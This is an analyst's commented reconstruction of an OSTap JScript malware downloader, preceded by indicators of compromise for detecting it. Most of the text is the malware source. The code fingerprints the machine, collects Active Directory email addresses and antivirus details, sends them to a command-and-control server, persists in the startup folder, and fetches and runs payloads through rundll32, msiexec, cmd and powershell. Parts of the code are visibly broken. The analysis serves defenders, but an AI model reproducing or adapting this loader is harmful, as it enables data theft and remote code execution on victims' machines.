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OSTap 2/1/2021 Commented and IOCs
It looks like the OSTap functionality that copies the OSTap script to files on
mapped drives has been turned off in this sample. The code for this functionality is
there, but a flag is set to false so the code is not run.
Brittle IOCS (easily changed by the OSTap developers):
- C2 IP: (very brittle IOC)
- Script executed with wscript/cscript with command line arguments "To Pa" or "dom"
- wscript/cscript writing files "som.dll" or "ToPa.exe" to disk.
- rundll32 running "som.dll"
- HTTP requests with user agent "Mozilla/5.0 (Windows NT 6.[1-4]; Win64; x64; Trident/7.0; rv:11) like Gecko"
(note the regex for the NT version number).
- A DLL that exports function "DllRegX".
More General IOCs:
Look for wscript processes with the "/E:JScript" or "/E:JScript.Encode" command line option spawning:
* wscript.exe with the "/E:JScript" or "/E:JScript.Encode" command line option.
* powershell.exe with "-noexit -executionpolicy bypass -File " command line options.
* msiexec.exe with "/i" as the only command line option.
* cmd.exe with command line '/C "[\\a-zA-Z0-9\._:]+">>[\\a-zA-Z0-9\._:]+ 2>&1' (note regex for file names).
* rundll32.exe
// Loop waiting for a while.
var loop_index1 = 1;
var big_garbage_string = '';
while (1) {
// Just chew up some memory with this garbage string that is never used.
big_garbage_string = big_garbage_string + "Bd6I";
// Should we actually do something?
if (loop_index1 == 176002) {
// Declare some variables that will be used later.
var http_response_text = null;
var file_pointer1 = null;
var new_text_file1 = null;
var file_pointer2 = null;
var file_contents1 = null;
var error_msg1 = "Ko5t5r 4eddr556f";
var wscript_object = this.WScript;
var counter1 = 0;
var error_msg2 = "56445645354356r63544234243";
var activex_object = this.ActiveXObject;
var bogus_except_var = 0;
var finger_print_code1 = 0;
var script_file_name = wscript_object.ScriptFullName;
var finger_print_loop_index = 0;
var wscript_shell_object = wscript_object.CreateObject("WScript.Shell");
var loop_index2 = 1;
// Issue a fake warning popup with the running script is not in the startup directory.
try {
if ((wscript_object.Arguments.Length == 0) && (script_file_name.toLowerCase().indexOf("\\" + "startup" + "\\") == -1)) {
if (false) {
wscript_shell_object.Popup(unescape(error_msg2), 10, unescape(error_msg1), 0);
} catch (bogus_except_var) {}
// Start the main OSTap loop.
while (1) {
// Should we actually do something? Note that this functionality will only
// be run once in this script execution.
if (loop_index2 == 40301) {
// Declare more variables.
var filesystem_object = new activex_object("Scripting.FileSystemObject");
var c2_url = null;
var curr_enumerator = finger_print_code1;
var wmi_object = null;
var wmi_object2 = null;
var curr_item = null;
var process_list_str = '';
var curr_line = '';
var file_prefix = '';
var drive_enumerator = null;
var drive_item = null;
var random_num = 0;
var computer_name = wscript_shell_object.Environment("PROCESS").Item("COMPUTERNAME");
var user_name = wscript_shell_object.Environment("PROCESS").Item("USERNAME");
var user_domain = wscript_shell_object.Environment("PROCESS").Item("USERDOMAIN");
var network_adapter_str = '';
var antivirus_str = '';
var machine_type = '';
var ldap_str = "no LDAP;";
var curr_email_addr = null;
var email_addr_str = '';
var ldap_default_naming_context = '';
var ldap_rootdse = null;
// Do a bit of anti-sandboxing. Anyone know what sandboxes these checks are looking for?
if (user_domain == "VBOX7-PC" ||
user_domain == "JANUSZ-PC" ||
user_domain == "ABBY-PC" ||
user_domain == "DESKTOP-HRW10" ||
user_domain == "AMAZING-LINGON" ||
user_domain == "SANDBOX-O365" ||
user_name == "Aimy" ||
user_name == "fred" ||
user_name == "Brad") {
// ei9() does not exist, so crash out if a sandbox is detected.
// Read in the current script contents.
try {
file_pointer1 = filesystem_object.OpenTextFile(script_file_name, 1, false, 0);
file_contents1 = file_pointer1.ReadAll();
file_pointer1 = null;
} catch (bogus_except_var) {}
// Are we running with no command line arguments?
if (wscript_object.Arguments.Length == 0) {
// Do some finger printing.
try {
// Grab the 1st 200 running processes and save to a string.
wmi_object = this.GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
counter1 = 0;
curr_enumerator = new this.Enumerator(wmi_object.ExecQuery("Select * from Win32_Process"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 200) break;
curr_item = curr_enumerator.item();
process_list_str = process_list_str + curr_item.Name + "*" + curr_item["ExecutablePath"] + "\r\n"
// Grab network adapter information and save to a string.
curr_enumerator = null;
counter1 = 0;
curr_enumerator = new this.Enumerator(wmi_object.ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 10) break;
curr_item = curr_enumerator.item();
network_adapter_str = network_adapter_str + "*" + curr_item["IPAddress"](0) + "::" + curr_item.Caption;
// Save the installed AV to a string.
try {
wmi_object2 = this.GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter2");
curr_enumerator = null;
counter1 = 0;
curr_enumerator = new this.Enumerator(wmi_object2.ExecQuery("Select * from AntiVirusProduct"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 10) break;
curr_item = curr_enumerator.item();
antivirus_str = antivirus_str + curr_item.displayName(0) + "::" + curr_item.pathToSignedReportingExe;
} catch (bogus_except_var) {}
// Save the classification of the infected machine to a string.
curr_enumerator = null;
counter1 = 0;
try {
curr_enumerator = new this.Enumerator(wmi_object.ExecQuery("Select DomainRole from Win32_ComputerSystem"));
while (!curr_enumerator.atEnd()) {
if (counter1 == 10) break;
curr_item = curr_enumerator.item();
switch (curr_item.DomainRole) {
case 0:
machine_type = "Standalone Workstation";
case 1:
machine_type = "Member Workstation";
case 2:
machine_type = "Standalone Server";
case 3:
machine_type = "Member Server";
case 4:
machine_type = "Backup Domain Controller";
case 5:
machine_type = "Primary Domain Controller";
machine_type = "none";
} catch (bogus_except_var) {}
// Grab all the user email addresses we can get from AD and save those to a string.
// Welcome to the spam list for OSTap droppers.
counter1 = 0;
try {
ldap_rootdse = this.GetObject("LDAP://RootDSE");
ldap_default_naming_context = ldap_rootdse.Get("defaultNamingContext");
ldap_str = "LDAP://" + ldap_default_naming_context;
var adodb_conn_obj = new activex_object("ADODB.Connection");
adodb_conn_obj.Provider = "ADsDSOObject";
adodb_conn_obj.Open("Active Directory Provider");
var adodb_cmd_object = new activex_object("ADODB.Command");
adodb_cmd_object.ActiveConnection = adodb_conn_obj;
adodb_cmd_object.CommandText = "SELECT Mail FROM '" + ldap_str + "' WHERE objectCategory = 'user'";
adodb_cmd_object.Properties("Page Size") = 100;
adodb_cmd_object.Properties("Timeout") = 30;
adodb_cmd_object.Properties("Searchscope") = 2;
adodb_cmd_object.Properties("Cache Results") = false;
var email_query_results = adodb_cmd_object.Execute;
while (!email_query_results.EOF) {
if (counter1 == 26000) break;
curr_email_addr = email_query_results("mail") + "*";
if (curr_email_addr != "null*") {
email_addr_str = email_addr_str + curr_email_addr;
} catch (bogus_except_var) {}
email_addr_str = ldap_str + ":SUM:" + counter1 + ":" + email_addr_str;
} catch (bogus_except_var) {}
// Setup for exfil of finger print data.
var shell_app_obj = new activex_object("Shell.Application");
var temp_dir = wscript_shell_object.ExpandEnvironmentStrings("%TEMP%");
var tmp_id_str = temp_dir;
var basic_recon_str = null;
// Compute a numeric code based on domain, user name, and computer name.
tmp_id_str = user_domain + computer_name + user_name;
for (finger_print_loop_index = 0; finger_print_loop_index < tmp_id_str.length; finger_print_loop_index++) {
finger_print_code1 = (((finger_print_code1 << (5)) - finger_print_code1) + tmp_id_str.charCodeAt(finger_print_loop_index)) & 4294967295;
finger_print_code1 = ((finger_print_code1 + 1) >>> 0).toString(16);
// Get the names of various secondary payload files.
var payload_file_name1 = temp_dir + "\\" + finger_print_code1 + 'user_name.Sim';
var payload_file_name2 = temp_dir + "\\" + finger_print_code1 + 'antivirus_str.Gos';
var payload_file_name3 = temp_dir + "\\" + finger_print_code1 + 'user_domain.Ews';
var file_contents1 = '';
// This OSTap sample has as the C2 server.
var c2_url_prefix = "";
var msxml2_obj = new activex_object("Msxml2.DOMDocument");
var base64_element = msxml2_obj.createElement("base64");
var adodb_stream_obj = new activex_object("ADODB.Stream");
var http_obj = new activex_object("Msxml2.ServerXMLHTTP.6.0");
// The recon data will be included in the C2 URL.
basic_recon_str = user_domain + "@@" + computer_name + "@@" + user_name + "@@" + network_adapter_str + "@@" + machine_type + "@@" + antivirus_str + "@@" + email_addr_str;
// Note that only the 1st 300 characters of the recon data are used.
var c2_url_suffix = "?si=I&ko=" + finger_print_code1 + "&cv=" + escape(basic_recon_str.slice(0, 300));
var seperator = "MaxrRfpiii=";
var c2_url_main = c2_url_prefix + c2_url_suffix;
var execution_stage = false;
var startup_folder = shell_app_obj.NameSpace(7);
// This is where we will persist OSTap in the startup folder.
var startup_payload_file_name = startup_folder.Self.Path + "\\" + finger_print_code1 + '.ldap_default_naming_context.jse';
var quit_flag = false;
var use_http_post_flag = false;
var random_num1 = 0;
var looks_like_a_mistake = null;
// Run with command line arguments "To Pa"?
if (wscript_object.Arguments.Length > 0 && wscript_object.Arguments(0) == "To" && wscript_object.Arguments(1) == "Pa") {
try {
} catch (bogus_except_var) {
try {
// Run file %TEMP%\ToPa ??? I guess?
this['wscript_shell_object'].Run(temp_dir + "\\" + wscript_object.Arguments(0) + wscript_object.Arguments(1), 1);
} catch (bogus_except_var) {}
// Quit the current executing OSTap.
// Run with command line arguments "dom"?
if (wscript_object.Arguments.Length > 0 && wscript_object.Arguments(0) == "dom") {
try {
// Run %TEMP%\som.dll with rundll32 and then quit the current executing OSTap.
wscript_shell_object.Exec("rundll32 " + '"' + temp_dir + "\\som.dll" + '"' + " DllRegX");
filesystem_object.DeleteFile(temp_dir + "\\som.dll");
} catch (bogus_except_var) {
// Are we running out of %TEMP% and we have a command line argument?
// In this case we will be renaming payload files and running things.
if (script_file_name.indexOf(temp_dir) > -1 && wscript_object.Arguments.Length > 0) {
try {
// Read in all the contents of a secondary payload file.
file_pointer1 = filesystem_object.OpenTextFile(payload_file_name2, 1, false, 0);
file_contents1 = file_pointer1.ReadAll();
// Fix up the read in file contents.
file_contents1 = file_contents1.replace("[A:true,U:false]", '');
file_pointer1 = null;
} catch (bogus_except_var) {}
// Delete the secondary payload file that was read in.
try {
} catch (bogus_except_var) {}
// 1st command line argument is "6"?
if (wscript_object.Arguments.length > 1 && wscript_object.Arguments(0) == "6") {
// We're going to save some payload in %TEMP% using the file name given as the 2nd command line argument.
payload_file_name2 = temp_dir + "\\" + wscript_object.Arguments(1);
quit_flag = true;
} else {
// 1st command line argument is not "6". Pick a random name for the payload.
random_num = Math.floor((Math.random() * 65019) + 10);
payload_file_name2 = payload_file_name2.replace(payload_file_name2.slice(-4), random_num + ".cmd");
// Decode base64 encoded payload.
try {
// Do the decode.
base64_element.dataType = "bin.base64";
base64_element.text = file_contents1.split(seperator).join('');
adodb_stream_obj.Type = 1;
adodb_stream_obj.Position = 0;
// Save the decoded payload to the file name chosen earlier.
adodb_stream_obj.SaveToFile(payload_file_name2, 2);
adodb_stream_obj = null;
file_contents1 = null;
// Should we just save the payload and quit?
if (quit_flag) {
} catch (bogus_except_var) {
// Decoding and saving the payload failed. Give up and quit.
// 1st command line argument is "0"?
if (wscript_object.Arguments(0) == '0') {
// Rename the payload file to "ToPa.exe".
try {
filesystem_object.GetFile(payload_file_name2).Name = "ToPa.exe";
} catch (bogus_except_var) {}
// 1st command line argument is "1"?
if (wscript_object.Arguments(0) == "1") {
// Rename the payload file to "som.dll".
try {
filesystem_object.GetFile(payload_file_name2).Name = "som.dll";
} catch (bogus_except_var) {}
// 1st command line argument is "5"?
if (wscript_object.Arguments(0) == "5") {
// In this case it looks like the dropped payload was a MSI file. Install the MSI with msiexec.
try {
shell_app_obj.ShellExecute("msiexec", "/i " + '"' + payload_file_name2 + '"', '', "open", 1);
} catch (bogus_except_var) {}
// 1st command line argument is "4"?
if (wscript_object.Arguments(0) == "4") {
// Rename the payload file.
try {
shell_app_obj.ShellExecute("cmd", "/C " + '"' + payload_file_name2 + '"' + ">>" + payload_file_name3 + " 2>&1", '', "open", 0);
} catch (bogus_except_var) {}
// 1st command line argument is "3"?
if (wscript_object.Arguments(0) == "3") {
// In this case it looks like the dropped payload was a powershell file. Run the powershell.
try {
seperator = payload_file_name2 + ".ps1";
filesystem_object.MoveFile(payload_file_name2, seperator);
shell_app_obj.ShellExecute("powershell", "-noexit -executionpolicy bypass -File " + '"' + seperator + '"', '', "open", 0);
} catch (bogus_except_var) {}
// 1st command line argument is "3"?
if (wscript_object.Arguments(0) == "2") {
// Copy the payload to the startup directory.
try {
filesystem_object["CopyFile"](payload_file_name2, startup_payload_file_name, true);
} catch (bogus_except_var) {}
try {
// Delete initial payload.
} catch (bogus_except_var) {}
// Start the loop hitting the C2 server.
while (7) {
try {
// We're going to be tacking on a random number as a GET parameter in each request.
c2_url = c2_url_main + "&" + Math.floor((Math.random() * (20000)) + 1) + Math.floor((Math.random() * (26800)) + 1);
http_obj.setOption(2, 13056);
// Sometimes do a GET, sometimes do a POST.
if (!use_http_post_flag) {"GET", c2_url, false);
} else {"POST", c2_url, false);
// Pick a user agent. Choose "NT 6.[1..4]" randomly.
random_num = Math.floor((Math.random() * 3) + 1);
http_obj.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6." + random_num + "; Win64; x64; Trident/7.0; rv:11) like Gecko");
// Doing a GET?
if (!use_http_post_flag) {
} else {
// Doing a POST.
use_http_post_flag = false;
try {
} catch (bogus_except_var) {}
// Did we hear back from the C2 server?
if (http_obj.status == 200) {
// What does the C2 server have for us?
http_response_text = http_obj.responseText;
try {
// Do we have the chunk seperator we expect to see in a base64 encoded payload?
if (http_response_text.indexOf(seperator) > -1) {
// We might be looking for the "info-package" value in the Content-Disposition ??
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("info-") > -1);
if (execution_stage) {
// Pause for a while if we already have a payload file.
file_contents1 = "nodata";
try {
if (!filesystem_object.FileExists(payload_file_name3)) {
} catch (bogus_except_var) {}
// Read in the contents of the current payload file.
try {
file_pointer1 = null;
file_pointer1 = filesystem_object.OpenTextFile(payload_file_name3, 1, false, 0);
file_contents1 = file_pointer1.ReadAll();
file_pointer1 = null;
} catch (bogus_except_var) {
file_contents1 = "error";
// Looks like we are going to POST to the C2 server sometime.
use_http_post_flag = true;
// I don't know what "llx-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("llx-") > -1);
if (execution_stage) {
execution_stage = 1;
} else {
// I don't know what "upd-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("upd-") > -1);
if (execution_stage) {
execution_stage = 2;
} else {
// I don't know what "pws-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("pws-") > -1);
if (execution_stage) {
execution_stage = 3;
} else {
// I don't know what "cmd-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("cmd-") > -1);
if (execution_stage) {
execution_stage = 4;
} else {
// I don't know what "msi-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("msi-") > -1);
if (execution_stage) {
execution_stage = 5;
} else {
// I don't know what "bin-" is looking for.
execution_stage = (http_obj.getResponseHeader("Content-Disposition").indexOf("bin-") > -1);
if (execution_stage) {
execution_stage = 0;
} else {
execution_stage = http_obj.getResponseHeader("Content-Disposition");
execution_stage = "6 " + execution_stage.slice(execution_stage.indexOf("filename=") + 9).split("_")[1];
// Pause for a while if some other payload file exists.
try {
if (filesystem_object["FileExists"](payload_file_name2)) {
} catch (bogus_except_var) {}
// Wrie the raw payload sent from the C2 server to disk.
new_text_file1 = filesystem_object.CreateTextFile(payload_file_name2, true, false);
new_text_file1 = null;
// Does the old payload look like it is JavaScript?
if (file_contents1.indexOf("catch(") > -1) {
// Save the old payload to a new file.
new_text_file1 = filesystem_object.CreateTextFile(payload_file_name1, true, false);
// We're going to be running regular JavaScript.
new_text_file1 = "/E:JScript ";
} else {
// That old payload is not JavaScript. The current running script IS JavaScript, so
// copy it over into a new file.
try {
filesystem_object.CopyFile(script_file_name, payload_file_name1, true);
} catch (bogus_except_var) {}
// We're going to be running encoded JavaScript.
new_text_file1 = "/E:JScript.Encode ";
// Run the JavaScript payload that we just wrote into a file.
try {
// First run it with the execution stage given on the CL.
wscript_shell_object.Exec("wscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " " + execution_stage);
// If the stage is 0, also run it with the CL arguments "To Pa".
if (execution_stage == 0) {
wscript_shell_object.Exec("wscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " To Pa");
// If the stage is 1, also run it with the CL arguments "dom".
if (execution_stage == 1) {
wscript_shell_object.Exec("wscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " dom");
} catch (bogus_except_var) {
// As a fallback try running the JS payload with cscript rather than wscript.
this['wscript_shell_object'].Run("cscript " + new_text_file1 + '"' + payload_file_name1 + '"' + " " + execution_stage, 0);
} else {
} catch (bogus_except_var) {
} else {
} catch (bogus_except_var) {
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